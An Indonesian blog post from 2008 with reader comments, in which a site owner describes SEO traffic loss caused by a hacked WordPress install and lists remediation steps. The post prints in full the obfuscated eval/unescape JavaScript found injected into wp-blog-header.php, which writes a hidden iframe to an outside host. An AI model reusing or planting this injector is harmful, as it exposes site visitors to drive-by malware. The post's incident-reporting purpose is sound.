SEO Case Study, Make Money Online and Tips

Beberapa hari ini salah satu web penghasil duit terbesar mengalami penurunan trafik yang cukup fantastis. Semula diatas 4K unique visitor/day sekarang cuma 0.4K/day. Saya pun mengira jika web tersebut terkena Google Sandbox tapi ternyata tidak. Bisa dibayangkan gimana puyengnya otak ini karena trafik merosot jauh banget dan tentunya income pun merosot tajam.

Ada yang ganjil kalo diliat dari stats extreme tracking seperti gambar dibawah ini:

Sepertinya ada yang memantau terus situs kita dengan menggunakan command:

site: namadomain.com nama-postingan-diweb-kita

Pertama saya pikir ini kerjaan staff Google karena jika diliat menggunakan IP address langsung dari Google Inc. Tapi yang mencurigakan, mengapa mereka menggunakan browser Internet Explorer (IE) padahal dalam Adsense ada afiliasi dengan Firefox. Selain itu resolusi monitornya pun masih menggunakan 800×600 pixel.

Setelah melakukan investigasi dan juga sambil nungguin kakak yang kena DB di rumah sakit (sekarang dah sembuh & masih rest di rumah), baca-baca forum akhirnya mencoba untuk melihat source code dari web tersebut. Dulu temen pernah kena hack kalo webnya ngga terlisting di Google karena dianggap spam. Setelah di-cek ternyata banyak banget link yang menuju situs tentang ‘obat kuat pria’. Karena dari kasus itu akhirnya mencoba menge-cek dan VOILA!! Ada javascript aneh ada dibawah tag html.

<!– ~ –><script type=”text/javascript”>
eval(unescape(”%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%
5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%
30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%
36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%
5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%
30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%
37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%
5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%
30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%
36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%
5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%
30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%
36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%
5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%
30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%
37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%
5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%
30%30%36%38%5C%75%30%30%36%35%5C%75%30%30%36%39%5C%75%30%30%
36%37%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%33%64%
5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%
30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%
37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%
5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%
30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%
36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%36%65%
5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%
30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%
32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%
5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%
30%30%33%65%27%29%3B”));
</script><!– ~ –>

Dan ternyata ada juga javascript itu di 2 web saya yang lainnya dan tentu saja mempunyai kasus yang sama. Udah cari kesana kemari solusi plus gimana cara menghilangkannya. Mulai dari menumpuk ‘footer.php’ ngga bisa, searching semua file ‘index.php’ yang katanya ada script itu juga ngga ada hasil. Akhirnya jalan satu-satunya dan memang paling ampuh yaitu UPGRADE WORDPRESS KE VERSI TERBARU. Untuk saat ini yang paling baru menggunakan versi 2.5.1

Untungnya hampir sebagian besar plugin sudah men-support WP 2.5 sehingga proses upgrade berjalan lancar. Dan sekarang ngga pernah lagi ada command yang ‘berasal dari Google’ tapi ternyata adalah ulah script. Hikmah dari smua ini adalah, jangan pernah merasa duit kita udah banyak dan akhirnya lupa kalo web itu juga perlu dirawat (upgrade ke versi terbaru). Lebih baik mencegah daripada mengobati, hanya karena segelintir script yang kita ngga tau itu apa akhirnya penghasilan merosot jauh. Sekarang pun masih upgrade semua web yang menggunakan wordpress biar ngga kecolongan lagi nantinya :)

BTW masih penasaran, ini script apa sih maksudnya?

Update
Ternyata hampir smua web saya yang mempunyai engine Wordpress terkena dampak dari script itu. Setelah tadi chatting and discuss ama Novian Onespay, trus karena penasaran dimana sih si penyusup naruh script itu. Dan ternyata ada di root pada file wp-blog-header.php paling bawah. Script berhasil disusupkan pada tanggal 4 Mei 2008 dan pada saat itu trafik web lagi tinggi-tingginya, dan setelah 4 hari langsung ancur trafiknya. Mudah-mudahan sekarang bisa pulih kembali dan juga dibantu dengan plus update content lagi :D

Ini bisa jadi pelajaran dan solusi yang saya lakukan yaitu :
1. update engine Wordpress ke versi terbaru (jangan lupa ikuti langkah-langkah updatenya, terutama backup database)
2. file index.php dan wp-blog-header.php yang ada di root di-CHMOD ke 444 (semula 644)
3. gunakan hosting yang menggunakan cpanel, karena user tentunya ngga boleh sama. lain halnya dengan hosting yang menggunakan cuma 1 account untuk mengakses seluruh web (misalnya: servage dan dreamhost), sangat rentan karena sekali disusupi langsung menyebar ke web yang lainnya yang menggunakan engine yang sama.
4. ubahlah password untuk masuk ke panel hosting setidaknya sebulan sekali untuk mencegah hal-hal yang tidak diinginkan (saya juga masih tetep males utk yang satu ini).
5. selalu update antivirus dan proteksi program anti malware/badware/spyware. siapa tau program jahat itu udah ngendon di komputer anda.

Posted on Friday, 16th May 2008 in Case Study, Wordpress | Comments (4)

1. mr.keke Says:
   May 25th, 2008 at 4:31 am

   bukannya itu wp bolong… karena plugin yang kita pakai kadang masih banyak bug-nya;)

   soalnya saya kemaren juga gitu…

2. widis Says:
   May 28th, 2008 at 1:22 am

   wah kalau ngecek satu-satu blog kita lumayan repot juga ya, secara blog yg pake wp ada 10 lebih. gimana nih ?

3. krisna Says:
   June 5th, 2008 at 1:24 pm

   #1 -> kl kasus skrg sih bukan krn wp-nya bolong, soalnya web yg ngga pake wp jg kena. jadi bisa dipastiin mmg hostingnya yg kena hack

   # cek aja 1 web dalam 1 hosting, kl ngga ada code kyk gitu berarti web yg lain yg msh dlm 1 hosting mungkin aman bro. tp ngga ada salahnya jg cek satu-satu ;)

4. adons Says:
   November 14th, 2008 at 8:44 am

   wah ada aja trik spamer edan… salut lah

Leave a Reply